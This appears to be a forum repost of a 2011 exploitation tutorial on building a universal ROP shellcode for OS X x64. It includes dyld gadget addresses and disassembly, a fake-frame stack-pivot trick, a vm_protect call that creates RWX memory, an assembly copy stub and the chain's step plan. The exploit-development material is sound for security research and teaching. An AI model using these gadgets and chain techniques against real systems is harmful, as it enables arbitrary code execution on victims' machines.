Nytro, posted November 23, 2011

Universal ROP shellcode for OS X x64

23/07/2011 - pa_kt

One of the hurdles one will encounter during OS X exploitation is the ASLR/DEP combination for 64-bit processes (32-bit processes don’t have DEP [1]). When implemented correctly, it’s an effective mitigation that can be circumvented only with an info leak. (Un)fortunately, OS X versions up to the recent Lion (10.7) offer only incomplete ASLR, which still allows attackers to succeed in their efforts to execute arbitrary code. One of the problems (among others) is that the dyld (dynamic loader) image is located at the same address in every process. This makes ROP possible: by controlling the stack, we can reuse snippets of code from dyld and, in effect, execute arbitrary code.

The only public ROP dyld shellcode for OS X was presented in [1]. Charlie Miller’s version works under the assumption that rax/rdi have specific values. Due to the x64 calling convention [2], this precondition is very likely to be met. Nevertheless, it would be useful to create a shellcode with weaker assumptions, and that’s exactly what this post is about. We will create a generic ROP shellcode, similar to sayonara, but for OS X.

Stack pivoting

We assume that rsp is fully controlled. Sometimes, achieving such a state is a nontrivial task in itself: for every bug, exploitation can begin with different register/memory values. In [1], an easy case of stack pivoting is described, where we start with rax pointing to controlled memory and rdi pointing to a valid buffer. We then set rsp = rax with:

    0x00007fff5fc24c8b mov QWORD PTR [rdi+0x38],rax
    (irrelevant)
    0x00007fff5fc24cd8 mov rsp,QWORD PTR [rdi+0x38]
    0x00007fff5fc24cdc pop rdi
    0x00007fff5fc24cdd ret

Easy! The problem is, we might not be lucky enough to start with rax pointing to fully controlled memory. For example, we may start with the following:

    call [rax+0x100]

where memory in the range [rax, rax+0xF0] is random, and we control a buffer starting at rax+0xF1.
Starting conditions are different for every bug, and pivoting the stack can be even harder than creating a ROP chain: during pivoting, the state we start with can be completely arbitrary, whereas during ROP we already control the stack.

There is no generic way to remedy this problem, but having a large database of usable gadgets would certainly help. That brings us to an annoying problem: the “leave” instruction. “Leave” is equivalent to:

    mov rsp, rbp
    pop rbp

If we don’t control rbp, we will lose control of the stack. The problem is that “leave” is very often present before “ret”, effectively limiting the number of gadgets we can use.

Fortunately, there is a little trick that will allow us to use any “leave” gadget. We need to create a “fake” stack frame with a series of 3 indirect calls, like so:

    dispatcher                 frame setup              "leaver" gadget

    call [rax]     --------->  push rbp
    (...)    <-----------+     mov rbp, rsp
    call [rax+4]         |     (...)
         |               |     call [rax+8]  -------->  (gadget)
         v               |                              leave
    continue             +----------------------------  ret

Start from call [rax] and follow the execution flow along the arrows. With such a construct, we can safely call any gadget ending with “leave / ret”. Such sequences (two indirect calls with different displacements near each other) may be rare, but we don’t need many of them; one is sufficient. We can use the second call (call [rax+4]) to jump to a sequence that will perturb rax and then jump back to “call [rax]”, allowing us to use the same “dispatcher” gadget as many times as we need to use a “leaver”.
Here’s an example of such a dispatcher, from dyld:

DISPATCHER:

    __text:00007FFF5FC0D1BF call qword ptr [rax+78h]
    __text:00007FFF5FC0D1C2 mov rsi, rax
    __text:00007FFF5FC0D1C5 test rax, rax
    __text:00007FFF5FC0D1C8 jz short loc_7FFF5FC0D1E0
    __text:00007FFF5FC0D1CA mov rax, [rbx]
    __text:00007FFF5FC0D1CD mov rcx, rbx
    __text:00007FFF5FC0D1D0 mov rdx, r12
    __text:00007FFF5FC0D1D3 mov rdi, rbx
    __text:00007FFF5FC0D1D6 call qword ptr [rax+80h]

FAKE FRAME SETUP:

    __text:00007FFF5FC0CD44 push rbp
    __text:00007FFF5FC0CD45 mov rbp, rsp
    __text:00007FFF5FC0CD48 mov [rbp+var_18], rbx
    __text:00007FFF5FC0CD4C mov [rbp+var_10], r12
    __text:00007FFF5FC0CD50 mov [rbp+var_8], r13
    __text:00007FFF5FC0CD54 sub rsp, 20h
    __text:00007FFF5FC0CD58 mov r12, rdi
    __text:00007FFF5FC0CD5B mov r13d, esi
    __text:00007FFF5FC0CD5E mov rax, [rdi]
    __text:00007FFF5FC0CD61 call qword ptr [rax+1A0h]

A few preconditions related to register values must be met for the gadgets above to work. Since we don’t control the stack during pivoting, we need to use gadgets ending with indirect jumps or calls to set registers and memory to the necessary values.

The “leave” problem is particularly crippling during pivoting, and that’s when fake frames should be used.
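To make the “leave” discussion concrete, here is a toy Python model of how call, push, leave and ret move rsp and rbp. It is only a sketch: the `Cpu` class, the stack address and the return-address constants are made up for illustration and do not correspond to anything in dyld. It compares running a “leave / ret” gadget directly with an uncontrolled rbp against running it through a fake frame.

```python
# Toy model of the stack effects of call / push / leave / ret on x86-64.
# It tracks only rsp, rbp, rip and a sparse memory map; it is not an emulator.
# All addresses below are hypothetical placeholders.

class Cpu:
    def __init__(self, rsp, rbp):
        self.rsp, self.rbp, self.rip = rsp, rbp, None
        self.mem = {}  # address -> 64-bit value

    def push(self, value):
        self.rsp -= 8
        self.mem[self.rsp] = value

    def pop(self):
        value = self.mem.get(self.rsp, 0)  # unknown memory reads as 0 here
        self.rsp += 8
        return value

    def call(self, return_address):
        # Only the stack effect of a call: push the return address.
        self.push(return_address)

    def leave(self):
        # leave == mov rsp, rbp ; pop rbp
        self.rsp = self.rbp
        self.rbp = self.pop()

    def ret(self):
        self.rip = self.pop()


STACK = 0x7000                 # where rsp happens to point
UNCONTROLLED_RBP = 0xDEAD0000  # some value we did not choose
AFTER_FIRST_CALL = 0x1111      # instruction after the dispatcher's first call
AFTER_THIRD_CALL = 0x3333      # instruction after the frame setup's call


def leaver_without_frame():
    cpu = Cpu(STACK, UNCONTROLLED_RBP)
    cpu.leave()
    cpu.ret()
    return cpu


def leaver_with_fake_frame():
    cpu = Cpu(STACK, UNCONTROLLED_RBP)
    cpu.call(AFTER_FIRST_CALL)  # dispatcher:  call [rax]
    cpu.push(cpu.rbp)           # frame setup: push rbp
    cpu.rbp = cpu.rsp           #              mov rbp, rsp
    cpu.rsp -= 0x20             #              sub rsp, 20h
    cpu.call(AFTER_THIRD_CALL)  #              call [rax+8] -> leaver gadget
    cpu.leave()                 # leaver gadget: leave
    cpu.ret()                   #                ret
    return cpu


if __name__ == "__main__":
    bad = leaver_without_frame()
    good = leaver_with_fake_frame()
    print("without frame: rsp =", hex(bad.rsp))
    print("with frame:    rsp =", hex(good.rsp), "rip =", hex(good.rip))
```

In the model, the direct “leave” moves rsp to wherever rbp pointed, while the fake frame makes “leave / ret” unwind back to the instruction after the dispatcher’s first call with rsp and rbp unchanged.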
During ROP, it’s easier to just control rbp and point it to memory set earlier.

ROP

The plan is simple: use gadgets from dyld to create an RWX memory area (using vm_protect), then copy normal shellcode to that area, and jump to it.

Here’s the vm_protect call we will use to make memory from dyld’s .data section executable:

    __text:00007FFF5FC0D34A mov r8d, ebx ; new_protection
    __text:00007FFF5FC0D34D xor ecx, ecx ; set_maximum
    __text:00007FFF5FC0D34F mov rdx, rax ; size
    __text:00007FFF5FC0D352 mov rsi, [rbp+address] ; address
    __text:00007FFF5FC0D356 lea rax, _mach_task_self_
    __text:00007FFF5FC0D35D mov edi, [rax] ; target_task
    __text:00007FFF5FC0D35F call _vm_protect
    __text:00007FFF5FC0D364 test eax, eax
    __text:00007FFF5FC0D366 jz short loc_7FFF5FC0D38D

    __text:00007FFF5FC0D38D loc_7FFF5FC0D38D:
    __text:00007FFF5FC0D38D cmp byte ptr [r12+0FAh], 0
    __text:00007FFF5FC0D396 jz short loc_7FFF5FC0D406

    __text:00007FFF5FC0D406 loc_7FFF5FC0D406:
    __text:00007FFF5FC0D406 mov rbx, [rbp+var_28]
    __text:00007FFF5FC0D40A mov r12, [rbp+var_20]
    __text:00007FFF5FC0D40E mov r13, [rbp+var_18]
    __text:00007FFF5FC0D412 mov r14, [rbp+var_10]
    __text:00007FFF5FC0D416 mov r15, [rbp+var_8]
    __text:00007FFF5FC0D41A leave
    __text:00007FFF5FC0D41B retn

This is the same technique as in [1]. A few registers need to be set for this to work: the registers used as parameters for vm_protect, and rbp, to survive the “leave / ret” at the end.
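As a quick reference for the register setup just described, the following Python sketch pairs each vm_protect parameter with the register that carries it under the System V AMD64 calling convention, and with the location the listing above reads it from. The protection constants are the standard Mach VM_PROT_* values; the dictionary and function names are made up for this illustration.

```python
# Standard Mach protection bits (mach/vm_prot.h).
VM_PROT_READ = 0x1
VM_PROT_WRITE = 0x2
VM_PROT_EXECUTE = 0x4

# Integer argument registers in System V AMD64 order.
SYSV_ARG_REGISTERS = ("rdi", "rsi", "rdx", "rcx", "r8", "r9")

# vm_protect parameters in declaration order.
VM_PROTECT_PARAMS = (
    "target_task", "address", "size", "set_maximum", "new_protection",
)

# Where the listing above takes each argument from (read off its comments).
GADGET_SOURCES = {
    "target_task": "[_mach_task_self_]",
    "address": "[rbp+address]",
    "size": "rax",
    "set_maximum": "0 (xor ecx, ecx)",
    "new_protection": "ebx",
}


def vm_protect_register_map():
    """Return {parameter: argument register} for the vm_protect call."""
    return dict(zip(VM_PROTECT_PARAMS, SYSV_ARG_REGISTERS))


def rwx_protection():
    """Protection value that requests read, write and execute access."""
    return VM_PROT_READ | VM_PROT_WRITE | VM_PROT_EXECUTE


if __name__ == "__main__":
    for param, reg in vm_protect_register_map().items():
        print(f"{param:15} -> {reg:4} (from {GADGET_SOURCES[param]})")
    print("RWX protection value:", rwx_protection())
```

Read this way, the values that have to be in place before entering the listing are ebx (protection), rax (size), the slot at [rbp+address], and rbp itself.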
We can set them one by one, jumping over different gadgets as described in [1], or set them all at once, using the following:

    __text:00007FFF5FC24CA1 mov rax, [rdi]
    __text:00007FFF5FC24CA4 mov rbx, [rdi+8]
    __text:00007FFF5FC24CA8 mov rcx, [rdi+10h]
    __text:00007FFF5FC24CAC mov rdx, [rdi+18h]
    __text:00007FFF5FC24CB0 mov rsi, [rdi+28h]
    __text:00007FFF5FC24CB4 mov rbp, [rdi+30h]
    __text:00007FFF5FC24CB8 mov r8, [rdi+40h]
    __text:00007FFF5FC24CBC mov r9, [rdi+48h]
    __text:00007FFF5FC24CC0 mov r10, [rdi+50h]
    __text:00007FFF5FC24CC4 mov r11, [rdi+58h]
    __text:00007FFF5FC24CC8 mov r12, [rdi+60h]
    __text:00007FFF5FC24CCC mov r13, [rdi+68h]
    __text:00007FFF5FC24CD0 mov r14, [rdi+70h]
    __text:00007FFF5FC24CD4 mov r15, [rdi+78h]
    __text:00007FFF5FC24CD8 mov rsp, [rdi+38h]
    __text:00007FFF5FC24CDC pop rdi
    __text:00007FFF5FC24CDD retn

We can fill a buffer in dyld’s .data section with the values we want to load into the registers and simply call the above gadget. The only problem with this approach is that rsp gets overwritten (mov rsp, [rdi+38h]), but we can remedy this by creating a “fake” stack somewhere in memory.

Below is a WRITE MEM gadget sequence we can use.

    __text:00007FFF5FC23373 pop rbx
    __text:00007FFF5FC23374 retn

    __text:00007FFF5FC24CDC pop rdi
    __text:00007FFF5FC24CDD retn

    __text:00007FFF5FC24CE1 mov [rdi+8], rbx
    __text:00007FFF5FC24CE5 mov [rdi+10h], rcx
    __text:00007FFF5FC24CE9 mov [rdi+18h], rdx
    __text:00007FFF5FC24CED mov [rdi+20h], rdi
    __text:00007FFF5FC24CF1 mov [rdi+28h], rsi
    __text:00007FFF5FC24CF5 mov [rdi+30h], rbp
    __text:00007FFF5FC24CF9 mov [rdi+38h], rsp
    __text:00007FFF5FC24CFD add qword ptr [rdi+38h], 8
    __text:00007FFF5FC24D02 mov [rdi+40h], r8
    __text:00007FFF5FC24D06 mov [rdi+48h], r9
    __text:00007FFF5FC24D0A mov [rdi+50h], r10
    __text:00007FFF5FC24D0E mov [rdi+58h], r11
    __text:00007FFF5FC24D12 mov [rdi+60h], r12
    __text:00007FFF5FC24D16 mov [rdi+68h], r13
    __text:00007FFF5FC24D1A mov [rdi+70h], r14
    __text:00007FFF5FC24D1E mov [rdi+78h], r15
    __text:00007FFF5FC24D22 mov rsi, [rsp+0]
    __text:00007FFF5FC24D26 mov [rdi+80h], rsi
    __text:00007FFF5FC24D2D retn

First we pop the value, then the address, and finally set memory with “mov [rdi+8], rbx”. Notice that we also trash values higher in memory, from rdi+0x10 to rdi+0x80, so we need to remember to write to LOWER addresses first.

We could copy our “normal shellcode” to RWX memory using the above sequence, but it would be wasteful in terms of stack space. Observe that to copy a single QWORD, we need 5 QWORDs on the stack (3 gadgets, address, value). It’s more efficient to create a small “stub” that will take care of this.

    ; copy normal shellcode to RWX area
    ; size = 0x1000
    stub:
        lea rsi, [r15+offset]
        xor rcx, rcx
        inc rcx
        shl rcx, 12
        lea rdi, [rel normal_shellcode] ; rip relative addressing
        rep movsb
    normal_shellcode:

rsi is set to point to the old stack (passed in r15); the normal shellcode starts at a constant offset from it. We save a bit of space by using rip-relative addressing (an x64 feature) to set rdi, rather than a constant 8-byte address.

To summarize:

1. set register values in dyld’s .data buffer
2. create a fake stack and a fake stack frame in memory
3. copy stub to future RWX area
4. set all registers to correct values
5. use vm_protect to create RWX area
6. load r15 with previous stack pointer
7. jump to RWX memory
8. stub will copy our “normal” shellcode from old stack to RWX mem
9. ???
10. PROFIT!

That’s it. The resulting ROP shellcode is bigger than the one in [1], but it doesn’t assume anything about registers. There is room for improvement, but in environments where you can spray megabytes of memory with JavaScript (like in Safari), the size of the shellcode is not critical.

You can download the final version here.

References:
[1] Charlie Miller, Mac OS X Hacking (Snow Leopard Edition), 2010
[2] Jon Larimer, Intro to x64 Reversing, 2011

Source: http://gdtr.wordpress.com/2011/07/23/universal-rop-shellcode-for-os-x-x64/